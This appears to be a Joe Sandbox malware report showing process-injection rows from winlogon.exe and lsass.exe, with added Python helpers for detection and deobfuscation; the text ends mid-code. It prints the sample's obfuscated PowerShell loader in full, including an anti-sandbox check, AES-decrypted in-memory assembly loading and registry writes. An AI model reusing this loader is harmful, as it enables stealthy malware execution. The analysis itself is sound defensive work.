        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2D60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1540000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: D90000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: CC0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 21F0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DC0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C20000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: AD0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2B30000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DC0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: BC0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 24A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C10000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2E20000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 6E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2260000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2EF0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: B80000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: AE0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DC0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 28E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2E80000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\cmd.exe base: 1D54F9D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\conhost.exe base: 281B7B90000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 20D204D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\more.com base: 1F66CF40000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 220C2280000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 220C22B0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 170A7FA0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\conhost.exe base: 29E3CD50000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1F8811D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: PID: 3084 base: 8C80000 value: 4DJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 8560Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\winlogon.exe base: 22FCE7B0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\lsass.exe base: 19AB9340000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1A53E9B0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dwm.exe base: 2382E970000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 27D8F490000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1AD09E70000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 20EBF9D0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 229EA670000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1777BD90000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1590E680000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 21C29A30000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 276D7290000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 21D84690000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 25BFDA60000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 16914530000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 227D2790000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 131E07D0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 13EB1F30000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 27714AC0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 237FE190000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 27C5FFB0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1B9EE140000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1B6D8940000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 26099880000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 267E87C0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 223D5150000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 272401A0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 24AD0130000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 2565A3D0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\spoolsv.exe base: DA0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 184F43B0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 2A196F80000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 21502F20000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1C8729B0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 233591B0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 21DDF750000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 10E069A0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 23F7E630000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 230BDE80000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1ED12670000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 120CB340000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 297251A0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1C84E940000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\sihost.exe base: 22ABD090000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 299C2130000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1A4D1190000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 280593C0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 28CCBE80000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 253D40E0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\ctfmon.exe base: 156E8510000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 20B71940000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\explorer.exe base: 8C80000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1C55E370000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 192BE930000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dasHost.exe base: 12EBA690000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 207A8900000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2E7C2740000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2393C930000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dllhost.exe base: 1A313AC0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2D010620000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 22F16090000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 17740F80000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1555CAF0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1EE9B270000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\SystemSettingsBroker.exe base: 198AF3F0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dllhost.exe base: 29660B00000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 25549A00000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 216C6E70000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 253DE550000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 261FF3A0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1C5D53F0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1A2AB790000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 580000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\conhost.exe base: 20BBD290000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1245E2D0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 210015E0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1BFC2D40000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dllhost.exe base: 1ACAD650000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 16740980000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 202E3B50000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 23CC1780000Jump to behavior
        Source: C:\Windows\System32\winlogon.exe Memory written: C:\Windows\System32\svchost.exe base: 253E67B0000
        Source: C:\Windows\System32\winlogon.exe Memory written: C:\Windows\System32\svchost.exe base: 26E0D650000
        Source: C:\Windows\System32\winlogon.exe Memory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C10000, E10000, 2EB0000, 2EC0000, 610000, E80000, 2CF0000, 27E0000, E00000, 2BE0000, 29A0000, 8A0000, DD0000, 27E0000, 2940000, DE0000, 3010000, 7C0000, 2880000, 3070000, 2C90000, C50000, C30000, 27E0000, 2A50000, BD0000, 10D0000, 2C30000, 2D70000, C70000, 1110000, D20000, 2A40000, 2870000, 1030000, C50000, 12E0000, C60000, 2660000, BE0000, 29B0000, 2F90000, 1380000, 15E0000, 15D0000, 2360000, 21D0000, 800000, 2BA0000, DA0000, 800000, F20000, 2CF0000, 2E40000, 26B0000, 1320000, 1320000, F70000, 2D60000, 1540000, D90000, CC0000, 21F0000, DC0000, C20000, AD0000, 2B30000, DC0000, BC0000, 24A0000, C10000, 2E20000, 6E0000, 2260000, 2EF0000, B80000, AE0000, DC0000, 28E0000, 2E80000 (80 write events into this image, bases in report order)
        Source: C:\Windows\System32\winlogon.exe Memory written: C:\Windows\System32\cmd.exe base: 1D54F9D0000
        Source: C:\Windows\System32\winlogon.exe Memory written: C:\Windows\System32\conhost.exe base: 281B7B90000
        Source: C:\Windows\System32\winlogon.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 20D204D0000
        Source: C:\Windows\System32\winlogon.exe Memory written: C:\Windows\System32\more.com base: 1F66CF40000
        Source: C:\Windows\System32\winlogon.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 220C2280000
        Source: C:\Windows\System32\winlogon.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 220C22B0000
        Source: C:\Windows\System32\winlogon.exe Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 170A7FA0000
        Source: C:\Windows\System32\winlogon.exe Memory written: C:\Windows\System32\conhost.exe base: 29E3CD50000
        Source: C:\Windows\System32\winlogon.exe Memory written: C:\Windows\System32\svchost.exe base: 1F8811D0000
        Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 20D20070000 (11 identical entries)
        Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\svchost.exe base: 1C872570000
        Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\svchost.exe base: 1C872840000
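The rows above are the most telling part of this report: winlogon.exe and lsass.exe have no business writing into other processes' address space, so every row with one of them as source is evidence of injected code running inside a protected system process and pivoting into user processes, including the Defender command-line scanner (MpCmdRun.exe). The helper below is an added example, not part of the Joe Sandbox report; it parses rows in exactly this format (tolerating the trailing link text), reduces them to a source/target summary with the base addresses written, and raises the two findings a detection engineer would want from such rows: a protected writer and a security-tool target. The lists of protected processes and security-tool images are my choice for the example; the embedded rows are copied from the report.

```python
import ntpath
import re
from collections import defaultdict

# One "Memory written" row as Joe Sandbox renders it: source image, target
# image and the base address of the region written.  The address group stops
# at the first non-hex character, so a trailing "Jump to behavior" is ignored.
ROW_RE = re.compile(
    r"Source:\s*(?P<src>.+?)\s*Memory written:\s*(?P<dst>.+?)\s+base:\s*(?P<base>[0-9A-Fa-f]+)"
)

# Assumption for this example: these system processes never write into other
# processes in normal operation, so a write sourced from them is injected code.
PROTECTED_WRITERS = {"winlogon.exe", "lsass.exe", "csrss.exe", "wininit.exe", "services.exe", "smss.exe"}

# Assumption for this example: a write into a Defender image gets its own finding.
SECURITY_TOOL_TARGETS = {"mpcmdrun.exe", "msmpeng.exe"}

# Rows copied from the report above (one or two per distinct source/target pair).
SAMPLE_ROWS = r"""
Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 253E67B0000Jump to behavior
Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 26E0D650000Jump to behavior
Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C10000Jump to behavior
Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: E10000Jump to behavior
Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 170A7FA0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 20D20070000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1C872570000Jump to behavior
"""


def _image(path):
    """Lower-cased file name of a Windows path, independent of the host OS."""
    return ntpath.basename(path).lower()


def parse_rows(text):
    """Return one (source path, target path, base address) tuple per parsed row."""
    events = []
    for line in text.splitlines():
        m = ROW_RE.search(line)
        if m:
            events.append((m["src"], m["dst"], int(m["base"], 16)))
    return events


def summarize(events):
    """Collapse events into {source image: {target image: sorted base addresses}}."""
    graph = defaultdict(lambda: defaultdict(set))
    for src, dst, base in events:
        graph[_image(src)][_image(dst)].add(base)
    return {s: {t: sorted(b) for t, b in targets.items()} for s, targets in graph.items()}


def findings(events):
    """Distinct alerts raised by the two rules above, as sorted strings."""
    out = set()
    for src, dst, _ in events:
        s, t = _image(src), _image(dst)
        if s in PROTECTED_WRITERS:
            out.add(f"protected process {s} wrote into {t}")
        if t in SECURITY_TOOL_TARGETS:
            out.add(f"security tool {t} was written to by {s}")
    return sorted(out)


if __name__ == "__main__":
    evts = parse_rows(SAMPLE_ROWS)
    for src, targets in summarize(evts).items():
        for dst, bases in targets.items():
            print(f"{src} -> {dst}: {', '.join(f'{b:X}' for b in bases)}")
    for alert in findings(evts):
        print("ALERT:", alert)
```

Fed the whole "Memory written" block instead of the seven sample rows, the summary shows two writers (winlogon.exe, lsass.exe) fanning out into a dozen targets, which is the shape to look for in Sysmon event 8/10 telemetry on a live host: a protected source image with many distinct target images.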
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\uy2g7z.bat' -ArgumentList 'wjzJMHoFZaIaceAGUG' -WindowStyle Hidden"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\uy2g7z.bat" wjzJMHoFZaIaceAGUG "
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function cuoF($vrVB){ Invoke-Expression -Verbose -Debug '$TaCK=35[S35ys35te35m35.S35e35cu35r35i35t35y35.35C35ry35pt35o35g35r35ap35hy35.35A35e35s35]:35:35C35r35e35a35te35(35);'.Replace('35', ''); Invoke-Expression -InformationAction Ignore '$TaCK.3sMo3sde3s=[3sS3sys3st3sem3s.3sS3se3sc3su3sr3sit3sy.3sC3sr3sy3spt3sog3sr3sa3sp3sh3sy.3sC3si3sp3sh3se3srM3so3sde3s]3s:3s:3sC3sBC3s;'.Replace('3s', ''); Invoke-Expression -Verbose -Debug -InformationAction Ignore '$TaCK.sRPasRddsRinsRgsR=[sRSsRyssRtsResRmsR.sRSsResRcusRrisRtsRysR.sRCrsRypsRtsRosRgsRrsRapsRhsRysR.sRPsRasRddsRisRngsRMsRosRdsResR]:sR:sRPsRKsRCsRSsR7;'.Replace('sR', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore '$TaCK.6iKe6iy=6i[S6iy6ist6ie6im.6iC6io6in6iv6ie6ir6it]6i::6iF6ir6io6imB6ias6ie6i66i46iS6itr6ii6in6ig6i("6ieX6iAI6iQp6iH6iXC6iI6iSA6iu6ir6iB6ic6iL6i+6icB6i4j6i66iW6il6i4f6irm6ib6i76i/6i66ihB6ig6ir6iJ6iH6i26icK6iI6i=");'.Replace('6i', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore -Verbose '$TaCK.pJIVpJ=[pJSypJspJtepJmpJ.CpJopJnpJvpJepJrpJtpJ]:pJ:FpJrpJopJmpJBapJsepJ6pJ4pJSpJtpJripJnpJgpJ("pJLypJW7pJocpJepJGopJ3pJ6XpJZpJlpJqpJrpJEpJEpJ5xpJlQpJ=pJ=");'.Replace('pJ', ''); $HzNF=$TaCK.CreateDecryptor(); $gTTC=$HzNF.TransformFinalBlock($vrVB, 0, $vrVB.Length); $HzNF.Dispose(); $TaCK.Dispose(); $gTTC;}function ppFM($vrVB){ Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug '$BYbD=uwNeuww-uwObuwjuwecuwtuw Suwyuwsuwtuweuwmuw.uwIOuw.MuweuwmuwouwryuwStuwruweuwauwmuw(,$vrVB);'.Replace('uw', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose '$aohN=uwNeuww-uwObuwjuwecuwtuw Suwyuwsuwtuweuwmuw.uwIOuw.MuweuwmuwouwryuwStuwruweuwauwmuw;'.Replace('uw', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore '$rQYH=QuNeQuw-QuObQujQuecQutQu 
SQuyQusQutQueQumQu.QuIOQu.CQuoQumQupQureQussQuiQuoQunQu.QuGZQuiQupQuSQutQurQueaQum($BYbD, Qu[IQuO.QuCoQumQuprQueQussQuiQuoQunQu.QuCQuoQumpQureQusQusQuiQuonQuMoQudQueQu]Qu:Qu:DQueQucQuoQumQupQureQusQus);'.Replace('Qu', ''); $rQYH.CopyTo($aohN); $rQYH.Dispose(); $BYbD.Dispose(); $aohN.Dispose(); $aohN.ToArray();}function QIGO($vrVB,$BCHx){ Invoke-Expression -Verbose -WarningAction Inquire '$lHpd=oR[SoRysoRteoRmoR.RoReoRfloReoRcoRtoRioRooRnoR.AoRssoReoRmoRboRlyoR]:oR:oRLoRooRaoRd([byte[]]$vrVB);'.Replace('oR', ''); Invoke-Expression -Debug -WarningAction Inquire '$AEjb=$lHpd.OBEnOBtrOByPOBoOBinOBt;'.Replace('OB', ''); Invoke-Expression -Debug '$AEjbR9.IR9nvR9okR9eR9($R9nR9ulR9lR9, $BCHx);'.Replace('R9', '');}function ZAB($lYat){ $registryPath = 'HKLM:\SOFTWARE\OOhhhm='; if (Test-Path $registryPath) { Remove-ItemProperty -Path $registryPath -Name * -Force } else { New-Item -Path $registryPath -Force; } Set-ItemProperty -Path $registryPath -Name 'Map' -Value 'vcKCVWMMyKQFoeskiSq;mNFaDYQRq;OvWrknEdQ'; Set-ItemProperty -Path $registryPath -Name 'vcKCVWMJump to behavior
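The `cmd.exe /c echo function cuoF(...)` command line above is the loader's PowerShell stage. Its only obfuscation is junk-token padding: every statement is a quoted literal with a two-character token spliced between its characters, stripped at run time by `.Replace('<token>', '')` and executed with `Invoke-Expression`. Stripped, the four functions read as AES-CBC/PKCS7 decryption with a hard-coded 32-byte key and 16-byte IV (`cuoF`), GZip inflation (`ppFM`), `[System.Reflection.Assembly]::Load` followed by `EntryPoint.Invoke` on the result (`QIGO`), and writing a `Map` value under `HKLM:\SOFTWARE\OOhhhm=` (`ZAB`). The Python below is an added triage helper, not part of the Joe Sandbox report or of the sample; it removes the tokens with the same left-to-right semantics as .NET `String.Replace`, pulls the key and IV out of the recovered statements, and mirrors the decrypt-then-inflate step for use on a carved payload blob. The fragments it carries are copied from the command line above; the ciphertext itself is not on this page, and `decrypt_and_inflate` needs the third-party `cryptography` package.

```python
import base64
import gzip
import re

# The loader's only obfuscation layer: each statement is a single-quoted
# PowerShell literal with a two-character junk token spliced between its
# characters, cleaned up at run time by .Replace('<token>', '') and handed to
# Invoke-Expression.  The regex captures the literal and the token.
REPLACE_RE = re.compile(r"'([^']*)'\.Replace\('([^']*)',\s*''\)")

# Shape of the cleaned statements that assign the AES key and IV.
AES_PARAM_RE = re.compile(r'\$\w+\.(Key|IV)=\[System\.Convert\]::FromBase64String\("([^"]*)"\);')

# Fragments copied from the "cmd.exe /c echo function cuoF(...)" command line
# in the report; the Invoke-Expression wrappers are dropped and the one
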